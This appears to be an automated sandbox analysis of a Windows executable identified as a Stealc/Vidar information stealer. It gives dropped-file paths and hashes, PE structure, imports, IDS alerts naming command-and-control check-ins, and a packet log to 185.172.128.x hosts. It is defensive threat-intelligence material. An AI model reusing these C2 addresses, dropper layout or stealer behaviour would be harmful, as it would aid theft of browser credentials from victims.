SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468161861235744
Encrypted:	false
SSDEEP:	6144:+IXfpi67eLPU9skLmb0b4KWSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSby:TXD94KWlLZMM6YFHf+y
MD5:	9E1662B7CAD8098E2DAF64E3AEBF388D
SHA1:	40F19C9572E265218A149D3EFAAC6D0CA0D82FB5
SHA-256:	89416CF1347832A7BFD28E92BC788EFEFFDA2FA9D53204AB6AA47C08CE3A15D1
SHA-512:	CE7E32B0331D5ED0D000251810524EAC42A670D4D085E4F5F400F577309A5BE9EC7A851089A78661DB0387D7E5E35449301FD0999CB04EF56BBF9A14249C6561
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....1...............................................................................................................................................................................................................................................................................................................................................aF..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.331543347163832
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	VucRf0jboS.exe
File size:	441'857 bytes
MD5:	5cd97a765e0c9463f57769117db519fa
SHA1:	10cbbb15ce42e4328441109668ebda4d4b7c15eb
SHA256:	3b37fec0af4f32196086cfaad850c32113b60766190d283e2bc2f92a19b8cf20
SHA512:	b5a3d26c52d100bde2bf184dfcd2865a9289f86a7c100620f9e1eeec1d163e48715f215ae39f46d78266c6923ef12b9dfea140a56ff38cbd3ac0a606ce9c68df
SSDEEP:	12288:pzE/JXGSxAxt9y/SkVDi0XSOoaOAG634KKy:cXGSx89y/SkdOT6IKp
TLSH:	D6949C0372E1BC60E5664B3A9F1EA6EC372DF8608F64AB1732485D1F54752B0D363B92
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L..._.)d...........

File Icon


Icon Hash:	4b254d494d45610d

Static PE Info

General

Entrypoint:	0x404102
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6429A25F [Sun Apr 2 15:42:23 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	1cd8d44520c2e3583895f01ac332cc01

Entrypoint Preview

Instruction
call 00007F95C4DDC942h
jmp 00007F95C4DD6545h
push 00000014h
push 00418F90h
call 00007F95C4DD84DDh
call 00007F95C4DDB098h
movzx esi, ax
push 00000002h
call 00007F95C4DDC8D5h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F95C4DD6546h
xor ebx, ebx
jmp 00007F95C4DD6575h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F95C4DD652Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F95C4DD651Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F95C4DD654Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F95C4DDAA1Eh
test eax, eax
jne 00007F95C4DD654Ah
push 0000001Ch
call 00007F95C4DD6621h
pop ecx
call 00007F95C4DDC4D3h
test eax, eax
jne 00007F95C4DD654Ah
push 00000010h
call 00007F95C4DD6610h
pop ecx
call 00007F95C4DDAF60h
and dword ptr [ebp-04h], 00000000h
call 00007F95C4DD9A17h
test eax, eax
jns 00007F95C4DD654Ah
push 0000001Bh
call 00007F95C4DD65F6h
pop ecx
call dword ptr [004130C4h]
mov dword ptr [04042A10h], eax
call 00007F95C4DDC929h
mov dword ptr [00454FC0h], eax
call 00007F95C4DDC526h
test eax, eax
jns 00007F95C4DD654Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x193e4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c43000	0x16b25	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c5a000	0x1454	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x188c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11893	0x11a00	d11986298e41d3938f6bd71b66d357de	False	0.60955507535461	data	6.689457188183286	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x6cd4	0x6e00	3ef318b1af2a27bc9b026b603611ed68	False	0.3873934659090909	data	4.723645842680116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c28a28	0x3b000	733e2c3aabd729c4b036a93678de23fb	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c43000	0x16b25	0x16c00	f2945447f3a4000437ed3bb979860f58	False	0.42659684065934067	data	4.973500871049824	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c5a000	0x1454	0x1600	e1e152770233974bda6dc894a10de5db	False	0.7233664772727273	data	6.346854839875379	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3c436b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4066820276497696
RT_ICON	0x3c43d80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.16400414937759336
RT_ICON	0x3c46328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.21365248226950354
RT_ICON	0x3c46790	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3694029850746269
RT_ICON	0x3c47638	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4562274368231047
RT_ICON	0x3c47ee0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.46255760368663595
RT_ICON	0x3c485a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4486994219653179
RT_ICON	0x3c48b10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2671161825726141
RT_ICON	0x3c4b0b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.30909943714821764
RT_ICON	0x3c4c160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.35904255319148937
RT_ICON	0x3c4c5c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5682302771855011
RT_ICON	0x3c4d470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5509927797833934
RT_ICON	0x3c4dd18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.6134393063583815
RT_ICON	0x3c4e280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.46255186721991703
RT_ICON	0x3c50828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4899155722326454
RT_ICON	0x3c518d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.49631147540983606
RT_ICON	0x3c52258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.44769503546099293
RT_ICON	0x3c526c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4229744136460554
RT_ICON	0x3c53568	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4833032490974729
RT_ICON	0x3c53e10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5858294930875576
RT_ICON	0x3c544d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5079479768786127
RT_ICON	0x3c54a40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.47271784232365144
RT_ICON	0x3c56fe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48545966228893056
RT_ICON	0x3c58090	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.49508196721311476
RT_ICON	0x3c58a18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5452127659574468
RT_STRING	0x3c58e80	0x332	data	0.47555012224938875
RT_STRING	0x3c591b4	0x354	data	0.46830985915492956
RT_GROUP_ICON	0x3c59508	0x68	data	0.7115384615384616
RT_GROUP_ICON	0x3c59570	0x68	data	0.6826923076923077
RT_GROUP_ICON	0x3c595d8	0x30	data	0.9375
RT_GROUP_ICON	0x3c59608	0x76	data	0.6779661016949152
RT_VERSION	0x3c59680	0x244	data	0.5396551724137931
RT_MANIFEST	0x3c598c4	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators	0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, GetExitCodeThread, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, GetOEMCP, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, EncodePointer, DecodePointer, HeapReAlloc, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetStdHandle, GetFileType, GetStartupInfoW, GetProcessHeap, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, SetFilePointerEx, LCMapStringW, OutputDebugStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/27/24-01:31:08.487333	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/27/24-01:31:16.462312	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49733	185.172.128.76	192.168.2.4
04/27/24-01:31:14.075716	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49733	80	192.168.2.4	185.172.128.76
04/27/24-01:31:15.895415	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49733	80	192.168.2.4	185.172.128.76
04/27/24-01:31:16.178347	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49733	185.172.128.76	192.168.2.4
04/27/24-01:31:16.180488	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49733	80	192.168.2.4	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2024 01:31:08.316412926 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 01:31:08.487085104 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 01:31:08.487227917 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 01:31:08.487333059 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 01:31:08.659436941 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 01:31:10.140281916 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 01:31:10.193240881 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 01:31:11.083406925 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 01:31:11.104739904 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 01:31:11.276055098 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 01:31:11.276169062 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 01:31:11.276288033 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 01:31:11.737292051 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 01:31:11.909100056 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 01:31:11.909671068 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 01:31:11.942275047 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 01:31:11.962421894 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.133594036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.133706093 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.137057066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.307507038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.307903051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.307943106 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.307984114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308022976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308053970 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.308059931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308082104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.308118105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308157921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308166981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.308196068 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308233976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308244944 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.308273077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.308326006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.480509043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480552912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480591059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480628967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480660915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.480667114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480706930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.480736017 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480788946 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.480814934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480920076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.480988979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481034040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481106043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481168032 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481195927 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481309891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481348038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481369019 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481388092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481446981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481458902 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481498003 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481549978 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481568098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481607914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481662035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.481678009 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481749058 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.481805086 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653079033 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653392076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653430939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653466940 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653476000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653506041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653517008 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653543949 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653580904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653599977 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653620005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653671026 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653671980 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653732061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653769970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653781891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653809071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653846979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653862953 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653886080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653922081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653943062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.653959036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.653995037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654011965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654031992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654068947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654083014 CEST	49732	80	192.168.2.4	185.172.128.59
